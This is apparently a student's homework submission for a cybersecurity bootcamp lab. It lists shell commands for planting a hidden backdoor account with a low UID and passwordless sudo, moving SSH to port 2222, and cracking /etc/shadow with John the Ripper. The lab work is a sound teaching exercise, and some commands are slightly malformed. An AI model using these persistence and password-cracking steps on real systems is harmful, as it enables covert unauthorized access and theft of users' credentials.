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## Week 6 Homework Submission File: Advanced Bash - Owning the System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Please edit this file by adding the solution commands on the line below the prompt. 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**Step 1: Shadow People** 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Create a secret user named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`sysd`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. Make sure this user doesn't have a home folder created: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`sudo adduser sysd --no-create-home`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Give your secret user a password: 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`sudo passwd sysd`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Give your secret user a system UID &lt; 1000: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`sudo usermod -u 900 sysd`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Give your secret user the same GID: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`sudo groupmod -g 900 sysd`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Give your secret user full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`sudo`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access without the need for a password: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`usermod -aG sudo sysd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visudo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# User privilege specification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sysd ALL=(ALL:ALL) NOPASSWD`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6.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Test that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`sudo`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access works without your password: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    sudo apt-get update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**Step 2: Smooth Sailing**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Edit the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`sshd_config`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file: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    sudo nano /etc/ssh/sshd_config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    #default values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    #port 22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    port 2222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**Step 3: Testing Your Configuration Update**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Restart the SSH service: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`sudo systemctl restart ssh`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Exit the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account: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`exit`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SSH to the target machine using your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`sysd`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account and port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`2222`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`ssh sysd@192.168.6.105 -p 2222`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`sudo`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to switch to the root user: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`sudo -s`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**Step 4: Crack All the Passwords**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SSH back to the system using your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`sysd`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account and port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`2222`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`ssh sysd@192.168.6.105 -p 2222`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Escalate your privileges to the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user. Use John to crack the entire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`/etc/shadow`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file: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`unshadow /etc/shadow &gt; mypasswd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    john mypasswd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    `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